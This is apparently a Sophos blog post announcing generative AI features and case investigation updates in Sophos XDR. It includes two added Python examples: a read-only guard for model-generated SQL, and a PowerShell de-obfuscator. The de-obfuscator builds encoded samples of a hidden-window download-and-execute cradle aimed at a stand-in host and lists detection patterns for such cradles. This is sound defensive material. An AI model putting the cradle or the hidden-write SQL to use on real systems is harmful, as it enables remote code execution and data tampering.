
Sophos XDR: New generative AI functionality and case investigation enhancements

Defenders need all the help they can get. The Sophos XDR team has been focused on delivering features and functionality that will expand and improve analysts’ efficiency and ability to detect and neutralize threats faster.

The latest enhancements expand the capabilities of Sophos XDR with generative AI (GenAI) and new case investigation functionality. The GenAI features are aimed at accelerating investigations, enabling less experienced analysts to carry out security operations, and neutralizing adversaries faster.

GenAI capabilities are available on an opt-in basis to all licensed Sophos XDR customers, so customers remain in control of whether they are used. Customers can opt into these features in Sophos Central.

AI Search

AI Search helps security analysts by letting them search large volumes of security data using natural language, making it easier to conduct investigations without needing to write SQL.

Powered by OpenAI’s large language models (LLMs), AI Search translates natural language queries into structured SQL queries that are executed against Sophos’ data lake.

Users can ask simple questions (e.g., “Show me all detections from the last week related to Windows Server”) and view results in a user-friendly format.
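Because the model's output is SQL that actually runs against the data lake, the boundary that matters is the one the database enforces on that connection, not the prompt. As an added example (not Sophos code and not how AI Search is implemented), the script below shows one way to constrain model-generated SQL before it reaches a data store: a pre-flight statement-shape check plus an engine-level read-only authorizer, demonstrated against a constructed in-memory SQLite table standing in for a slice of the data lake. The table schema, the sample rows, and the SQL assumed to come from the model for the "detections from the last week related to Windows Server" question are all assumptions.

```python
import re
import sqlite3

# Constructed sample rows standing in for a slice of a detections table.
# These are made-up values, not Sophos data.
SAMPLE_DETECTIONS = [
    ("2024-05-01T10:00:00Z", "SRV-WIN-01", "Windows Server 2019", "high", "T1059.001"),
    ("2024-05-02T08:30:00Z", "SRV-WIN-02", "Windows Server 2022", "medium", "T1047"),
    ("2024-05-02T09:15:00Z", "WS-FIN-07", "Windows 11", "low", "T1204.002"),
    ("2024-04-20T23:05:00Z", "SRV-WIN-01", "Windows Server 2019", "high", "T1003.001"),
]

# Only these authorizer actions are permitted: selecting, reading rows and
# calling built-in SQL functions. Everything else (INSERT, DELETE, DROP,
# ATTACH, PRAGMA, recursive CTEs, ...) is denied when the statement is compiled.
ALLOWED_ACTIONS = {sqlite3.SQLITE_SELECT, sqlite3.SQLITE_READ, sqlite3.SQLITE_FUNCTION}


def _read_only_authorizer(action, arg1, arg2, db_name, trigger_or_view):
    return sqlite3.SQLITE_OK if action in ALLOWED_ACTIONS else sqlite3.SQLITE_DENY


def open_sample_lake():
    """Load the sample rows, then lock the handle down to read-only queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE detections (ts TEXT, device TEXT, os TEXT, severity TEXT, technique TEXT)"
    )
    conn.executemany("INSERT INTO detections VALUES (?, ?, ?, ?, ?)", SAMPLE_DETECTIONS)
    conn.commit()
    # Installed after loading: from here on the engine refuses anything but reads.
    conn.set_authorizer(_read_only_authorizer)
    return conn


def statement_shape_error(sql):
    """Cheap pre-flight check on the text the model produced.

    Returns None if the text is a single SELECT/WITH statement, otherwise a reason.
    This is a coarse filter only; the authorizer is the actual enforcement point.
    """
    body = sql.strip().rstrip(";").strip()
    if not body:
        return "empty statement"
    if ";" in body:
        return "more than one statement"
    if not re.match(r"(select|with)\b", body, re.IGNORECASE):
        return "not a SELECT"
    return None


def run_generated_sql(conn, sql, max_rows=1000):
    """Execute model-generated SQL on the read-only handle, capping the rows returned."""
    reason = statement_shape_error(sql)
    if reason is not None:
        return {"ok": False, "error": "rejected before execution: " + reason, "rows": []}
    try:
        cur = conn.execute(sql)
        rows = cur.fetchmany(max_rows)
    except sqlite3.DatabaseError as exc:
        # SQLITE_DENY from the authorizer surfaces here as "not authorized".
        return {"ok": False, "error": "rejected by engine: " + str(exc), "rows": []}
    return {"ok": True, "error": None, "rows": rows}


def row_count(conn):
    return conn.execute("SELECT count(*) FROM detections").fetchone()[0]


if __name__ == "__main__":
    lake = open_sample_lake()
    # Assumed model output for "show me all detections from the last week
    # related to Windows Server" (a made-up translation, not a real AI Search result).
    good = ("SELECT ts, device, technique FROM detections "
            "WHERE os LIKE 'Windows Server%' AND ts >= '2024-04-28T00:00:00Z' ORDER BY ts")
    print(run_generated_sql(lake, good))
    # A write hidden behind a CTE passes the shape check but is denied by the engine.
    sneaky = ("WITH x AS (SELECT 1) INSERT INTO detections "
              "SELECT '2024-05-03T00:00:00Z', 'EVIL', 'x', 'low', 'T0000' FROM x")
    print(run_generated_sql(lake, sneaky))
    print(row_count(lake))  # still 4: the table was never modified
```

The two checks are deliberately layered: the shape check rejects obviously wrong output cheaply, while the authorizer catches anything the text filter misses, such as a write hidden behind a CTE. On a production data lake the equivalent control is a dedicated read-only role or connection for generated queries, together with row and time limits.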

For more details, please refer to the AI Search article on the Sophos Community.

AI Case Summary

AI Case Summary provides an easy-to-understand overview of detections and recommended next steps, helping analysts make smart decisions fast.

This feature uses GenAI to analyze detections associated with a case to summarize what has happened, the entities involved, and possible next steps for investigation.

AI Case Summary also determines which MITRE ATT&CK tactics, techniques and procedures (TTPs) are observed within the case, if any.

AI Command Analysis

AI Command Analysis provides insights into attacker behavior by examining potentially malicious commands that create detections.

This feature uses GenAI to analyze the command line executed in the customer’s environment, explain its intent, and describe the possible security impact on the environment. AI Command Analysis also de-obfuscates code, reducing the complexity, time, and skill needed to assess a detection.
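The deterministic part of that de-obfuscation is worth knowing by hand, because it is what an analyst checks the model's explanation against. As an added example, not Sophos's AI Command Analysis and not code from the original post, the script below peels the layers most often seen in PowerShell detections: the -EncodedCommand argument (base64 of UTF-16LE text), embedded [Convert]::FromBase64String(...) blobs, and an in-memory gzip stage, then tags the indicators that surface in any layer. The command lines are constructed inside the block (example.invalid is a reserved name) and the indicator list is a small assumed set, not a Sophos rule set.

```python
import base64
import gzip
import re

# ---- constructed sample command lines (not real telemetry) -------------------
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"


def _ps_encode(script):
    """Encode a script the way `powershell -EncodedCommand` expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# One layer: -EncodedCommand carries the payload directly.
SAMPLE_SIMPLE = "powershell.exe -NoP -W Hidden -Enc " + _ps_encode(PAYLOAD)

# Two layers: -EncodedCommand wraps a stager that base64-decodes and gunzips the payload.
_inner = ("$d=[Convert]::FromBase64String('"
          + base64.b64encode(gzip.compress(PAYLOAD.encode("utf-8"))).decode("ascii")
          + "');IEX ([IO.StreamReader]::new([IO.Compression.GzipStream]::new("
          "[IO.MemoryStream]::new($d),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()")
SAMPLE_NESTED = "powershell -w hidden -ec " + _ps_encode(_inner)

# ---- decoding -----------------------------------------------------------------
# powershell.exe accepts -e, -ec and any prefix of -EncodedCommand starting with -en.
ENC_FLAG = re.compile(r"(?i)(?<![\w-])-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})")
B64_CALL = re.compile(r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

# Assumed indicator set for illustration; a real rule set is larger and tuned.
INDICATORS = {
    "invoke-expression": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "download-cradle": re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"),
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "gzip-stage": re.compile(r"(?i)GzipStream"),
}


def _bytes_to_text(raw):
    """Turn a decoded blob into text: gunzip if needed, then pick UTF-16LE or UTF-8 (heuristic)."""
    if raw[:2] == b"\x1f\x8b":          # gzip magic: an in-memory GzipStream stage
        raw = gzip.decompress(raw)
    if b"\x00" in raw[:64]:              # NUL-interleaved bytes: UTF-16LE text
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def deobfuscate(cmdline, max_layers=5):
    """Peel -EncodedCommand and FromBase64String layers off a command line.

    Returns every intermediate layer, the innermost script, and the indicators
    found in any layer, so the analyst can see how the conclusion was reached.
    """
    layers = [cmdline]
    current = cmdline
    for _ in range(max_layers):
        m = ENC_FLAG.search(current)
        if m:
            current = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
            layers.append(current)
            continue
        m = B64_CALL.search(current)
        if m:
            current = _bytes_to_text(base64.b64decode(m.group(1)))
            layers.append(current)
            continue
        break
    indicators = sorted(name for name, rx in INDICATORS.items()
                        if any(rx.search(layer) for layer in layers))
    return {"layers": layers, "final": current, "indicators": indicators}


if __name__ == "__main__":
    for sample in (SAMPLE_SIMPLE, SAMPLE_NESTED):
        result = deobfuscate(sample)
        for depth, layer in enumerate(result["layers"]):
            print(f"layer {depth}: {layer[:100]}")
        print("indicators:", result["indicators"], "\n")
```

The decoder is bounded by max_layers so a blob that re-encodes itself cannot loop forever, and it keeps every layer rather than only the final script: when a model summary says "downloads and executes a remote script", the layer list is what lets an analyst confirm that claim from the raw telemetry.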

Coming Soon: AI Assistant

The Sophos AI Assistant is a collaborative, conversational chat interface designed to elevate security operations.

Underpinned by the Sophos Data Lake and a set of robust tools, the AI Assistant uses GenAI to streamline complex investigations and improve threat response, regardless of the analyst's level of expertise.

Sophos and AI

Sophos combines AI and human expertise to stop the broadest range of threats wherever they occur. Security analysts are empowered to make smart decisions fast, and customers can operate confidently, knowing Sophos’ robust, battle-proven AI solutions are on their side.

Since 2017, Sophos has been elevating cybersecurity with AI. Deep learning and GenAI capabilities are embedded at every point and delivered through the industry’s largest, most scalable, open AI platform.

Sophos’ AI-powered products and services secure over 600,000 organizations from cyberattacks and breaches.

New case investigation enhancements

When an analyst examines the specifics of a detection that is part of a case, they now benefit from a refreshed, simplified pivot menu with new quick actions and updated queries.

The pivot menu allows an analyst to select key information from a detection, using it as a starting point for deeper investigation and immediate action.

Here’s what’s new:

  • Run actions: We have added the ability to isolate and un-isolate devices directly from the pivot menu, allowing users to remediate quickly without losing context
  • Run Live Discover and Search Data Lake: The queries list has been updated to feature the most frequently used queries
  • Copy Device Name: Easily copy the device name to the clipboard
  • Detections with Device: Go straight to the detections page to see all detections associated with the device; the default time range is the last 24 hours
  • Device Details: Navigate directly to the device details page for more in-depth information

The Cases public API has also been enhanced, allowing customers and partners to create, update, and delete cases using their preferred tools.

With this new functionality, customers can easily modify key fields such as case status, severity, and case summary, enabling more effective prioritization and faster triage times.

These improvements are designed to give customers more flexibility in their workflows and help address issues more efficiently. Please refer to the Cases API Guide for more details.

Source: Sophos